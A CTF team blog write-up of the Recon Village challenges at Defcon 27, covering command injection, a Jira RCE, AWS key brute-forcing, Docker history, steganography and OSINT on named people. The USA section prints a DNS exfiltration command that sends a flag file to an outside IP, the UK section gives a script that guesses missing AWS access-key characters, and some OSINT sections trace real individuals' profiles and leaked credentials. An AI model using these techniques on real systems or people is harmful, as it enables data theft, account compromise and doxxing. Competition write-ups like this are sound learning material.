Skip to main content

Recon Village CTF @ Defcon 27

My CTF team, Neutrino Cannon, participated in the Recon Village CTF at Defcon 27 once again for the third year in a row, and as the saying goes "the third time is the charm" as we managed to finish in first place. We dedicated almost all of our time at Defcon to the CTF, and the team's unwavering focus to complete challenges locked in the victory.


There were a lot more challenges this year than in past years, and while this write-up will include most challenges, it will not be a fully inclusive list. However, the official write-up from the Recon Village team should be released in the coming days, so be sure to check that out as well.

Challenge Solutions


USA - 500 points


Opening the provided URL into a browser, the site greets us with a simple input field.


The source code revealed that the flag would be located at "/opt/flag.txt", so we knew there would be something that could be done here to allow for LFI or an injection of some sort.

We started by doing simple manual tests for, and while XSS was successful, it didn't seem like it would yield anything useful. Noticing that the page was PHP, we then moved onto trying PHP code injection to see if anything would run. This did not pan out, so we continued to fuzz this for potential issues with a Burp Collaborator server up and noticed that it was receiving hits for straight up OS command injection.


Seeing that the server was pinging the collaborator server successfully we realized we had a blind OS command injection. Unfortunately, we could not get a reverse shell, but we managed to retrieve the flag through DNS exfiltration using nslookup.

First we setup a tcpdump to monitor for DNS queries:
"tcpdump -ni eth0 udp port 53"

Then we input the following command:
"nslookup $(cat /opt/flag.txt) <IP address>"

When it makes the query we can retrieve the flag.


Turkey - 300 points


Doing a quick Nmap scan of this IP reveals that port 8080 is open and it is running JIRA.


Based on the version indicated at the page footer, there is a CVE associated with this for RCE.

References:
-https://medium.com/@ruvlol/rce-in-jira-cve-2019-11581-901b845f0f
-https://community.atlassian.com/t5/Jira-articles/CVE-2019-11581-Critical-Security-Advisory-for-Jira-Server-and/ba-p/1128241

Using this with a reverse shell payload, we are able to access the server and retrieve the flag.


(*A screencap was not taken when capturing the flag from this RCE, and unfortunately (though not confirmed for certain) we believe something was wrong with the server after a while as RCE through this method no longer worked for my team or other teams when discussing post-CTF)

Mongolia - 300 points


Based on the challenge text and the website, spidey-sense was tingling that we either needed to send hash collision strings or there would be a type juggling vulnerability.


Interestingly, however, the strings that were being sent to the server were not being processed by a normal MD5 hashing function, as the values that were being output to the screen were not matching the MD5 sum of the strings we were getting locally. We thought it could be salting it or performing multiple hashings; however, we turned to type juggling as another idea.


Changing the get request so that the parameters are empty arrays tricks the check that the strings are different, but they evaluate to be the same hash through the PHP code.


United Kingdom - 300 points


Looking at the fragment of the key in the challenge text, we realized that this was an AWS-related challenge based on the "AKIA" prologue. There are two parts required to access and query AWS: the access ID (this is the key that is missing characters) and the private key (which they graciously gave to us). Since we have the private key and the access ID is only missing two characters, we wrote a python script in conjunction with a bash script to test all possible combinations which will perform a simple query. Based on the output we could determine which characters completed the key.

Bash script to query:
https://gist.github.com/cauealvesbraz/1121c0a0375648db13b137b31ef8955d

Python wrapper script:

#!/usr/bin/python

import random
import string
from commands import *
import os
import sys

key_id = "AKIA2SR3ZZCIQ7LT5Q" #xx
a_key = "wotwpfUVRMmhkRoGPfgxd69enU6e0lnLqwnvZjtg"

lettersAndDigits = string.ascii_uppercase + string.digits
missing = list()
for i in lettersAndDigits:
    for j in lettersAndDigits:
    missing.append( i + j )

for i in missing:
    f = open("/root/.aws/credentials",'w')
    new_key_id = key_id + i
    f.write("[default]\naws_access_key_id = " + new_key_id + "\n"+"aws_secret_access_key = " + a_key + "\nregion = us-east-1\n")
    f.close()
    status, text = getstatusoutput("./key.sh " +new_key_id)
    if "InvalidClientTokenId" in text:
        print "NOT FOUND: " + new_key_id + "\n [!]RESULT: " + text + "\n\n"
    else:
        print "******FOUND******\n" + new_key_id + "\n [+]RESULT: " + text + "\n\n"
        k_f = open("key.txt","w")
        k_f.write(str(new_key_id))
        k_f.close()
        break

This resulted in the following access ID: AKIA2SR3ZZCIQ7LT5QVZ

With the valid access ID and private key, we could list the S3 buckets present and retrieved the flag.


Canada - 400 points


The challenge text reeked of Docker, and trying out a 'docker pull' on the potential repo successfully grabbed an image.


Exploring the history, there was a curl command being executed to retrieve a node_js-related file. Curling this file, we see mention of a git repo in the source code.



Browsing to this, we combed through the commit history and discovered the flag.


Belarus - 200 points


Image:

Looking closely at the image, there is faint text on the white building's wall. Zooming in on it reveals "English National Ballet".

 https://www.google.nl/maps/place/English+National+Ballet/@51.5120302,0.0062593,17z/data=!4m5!3m4!1s0x4876055b0af21cdb:0x435e69d83228ec35!8m2!3d51.5132496!4d0.0064038

The above map shows that the nearest train station is "Canning Town" which is the flag.


Ethiopia - 100 points


Using Zoomeye, we crafted a search query to locate the indicated host, and thus the flag.

"+country:"MX" +app:"WebLogic applications server" +after:"2015-01-01" +before:"2016-01-01""


Australia - 200 points



This challenge required you to be on-site at Defcon. Looking at the back of the regular Recon Village badge passed out to attendees, there was a string of binary.


Converting this to ascii we only got "https://pa". Having noticed that staff were wearing a red badge and we had a black badge, we knew we had to track one of them down to get the next part of the puzzle.

Checking out a red badge gave us more information:

"https://pastebin.com"

We immediately realized that speakers at the village had a different color badge, and after waiting for a speaker to be free after a talk, we secured the key part of the URL and retrieved the flag.


"https://pastebin.com/CQ5Bg9X7"

flag:{y0uar3g00datnetw0rking}

South Africa - 300 points


Image:

Based on the text written on the building that shows "Shakespeare's Board", we were able to locate it on the map:
https://www.google.com/maps/place/Shakespeare%27s+Head/@51.516816,-0.1218747,17z/data=!3m1!4b1!4m5!3m4!1s0x48761b350efbd81b:0x5db525154ac44772!8m2!3d51.516816!4d-0.119686

Changing the address to "70", we determined that the company was 'Mishcon de Reya'

After a bit of searching found that the "mishcon.com/people" page listed profiles of employees, and found that Lena Kearney was the Strategy Manager.

Heading to Facebook and searching for her, the present work listing matched and exploring her profile revealed the name of the catering company: "Sinclair's Catering", which was the flag.

Norway - 300 points


With some Google-fu, we suspected the student was Ben Price:
http://www.diggah.net/contact-2/

Doing a bit more...digging...we found his email to be "diggah@diggah.net". Searching with this email, we found a pastebin dump with credentials, which was the flag.

https://pastebin.com/YKMtMT6J
flag:{diggah@diggah.net:m0nkeyfun} 

Thailand - 100 points


Image:

Pretty basic steganography challenge. Exiftool reveals a steghide password:


Then using Steghide, we got the 'secrets.txt' file which contained the flag.


Romania - 200 points


We are given a zip that contains a public.pem and a secrets.zip file which is encrypted. Using the well-known RsaCtfTool (https://github.com/Ganapati/RsaCtfTool) we were able to retrieve the private key and then decrypt the zip file with 'openssl rsautl'.




Results


Feedback and Comments

The organizers did a great job as always putting on this CTF and we had a lot of fun participating again this year. You could feel their passion and devotion to creating something exciting and challenging based on the boost in challenge difficulty and volume. There are only a couple of tweaks we would recommend for improving CTFs moving forward. First, a couple of the challenges were overly vague in the description, which is understandable to create a challenge, but for certain instances a slight bit more direction as to what we are searching for would have been appreciated (looking at you Spain!). However, this may be elucidated in the official writeup. And lastly, just a bit more communication from the organizers. There were a couple of hiccups at the start where challenges did not have their attachments and teams were hunting for something completely off, and a broadcast on the gameboard or Tweet would have been appreciated. Overall it was super fun and we are looking forward to seeing what's in store next year! Thank you again!








Comments

Popular posts from this blog

Facebook CTF 2019

I spent nearly all weekend bashing my head against the wall trying to solve the challenges developed by the masterminds behind the Facebook CTF. Though I only managed to solve a couple, I felt decently accomplished and had a lot of fun.


Challenge: "homework_assignment_1337"

This was a neat challenge that involved developing a Thrift client based on a provided .thrift file in order to perform pings to the Thrift server. While pinging the server alone was not enough to get the flag, there was a nice exploit(?) to make the server dump the flag.

I had no idea what Thrift even was, so headed to Google to read the documentation. Essentially it is a nice lightweight way for making RPCs and spinning up a client (and server for that matter) was not too difficult. Full documentation and starting guide can be found here.

I decided to go the Python route, so first, using the provided ping.thrift file, we generate the Python code.


thrift -r --gen py ping.thrift
After the Python is genera…

Game of Thrones CTF: 1 Walkthrough

VM name:
Game of Thrones Hacking CTF

Objective:
Collect all the flags

This was a refreshing challenge after doing a bunch of boot-to-root VMs, and I had a lot of fun--especially with the theme being Game of Thrones. There was also a ton to learn from it. So let's get to it...

Arp-scan and Nmap first as usual to find out the target IP and ports/services enumeration.




We've got a lot to sort through, but let's hit port 80 first by accessing it with a browser.



Taking a look at the source, we get a full scoop on the rules, goals, and some hints.



Next we take a look at robots.txt.



Let's explore these one by one. First: /the-tree/. We are stopped by Jon Snow, who seems to be telling us that we know nothing, but looking at the source code for this page we get another hint.




Look at those capital letters spelling it out for us. We need to change our user-agent to be the three-eyed raven as indicated by robots.txt.



Now that we added a user agent and swapped to it, reloading the pa…

Recon Village CTF @ Defcon 26

Defcon 25's Recon Village CTF was a ton of fun and my team was very much looking forward to participating during Defcon 26. I think in comparison to last year, this year's CTF proved to be a bit more challenging, and we decided to go full force to get top 3. It was a close race, but we were passed at the end and got knocked into 5th.

Below are the challenges that were released and a write-up of the solutions. We'll be ready for another round at Defcon 27!



Challenge 1
Performing a search for the email address, it was easy to determine that it was associated with a Tumblr account. 

Once at the Tumblr page; however, there was no post made on August 2. Time to blast back into the past with the internet archive, the Wayback Machine.


Searching for the Tumblr URL along with 'post', we find a post made on August 2 that was deleted. Following this link we arrive at the missing post:

And finally, heading to the Pastebin link, we arrive at the flag:



Challenge 2
It's easy …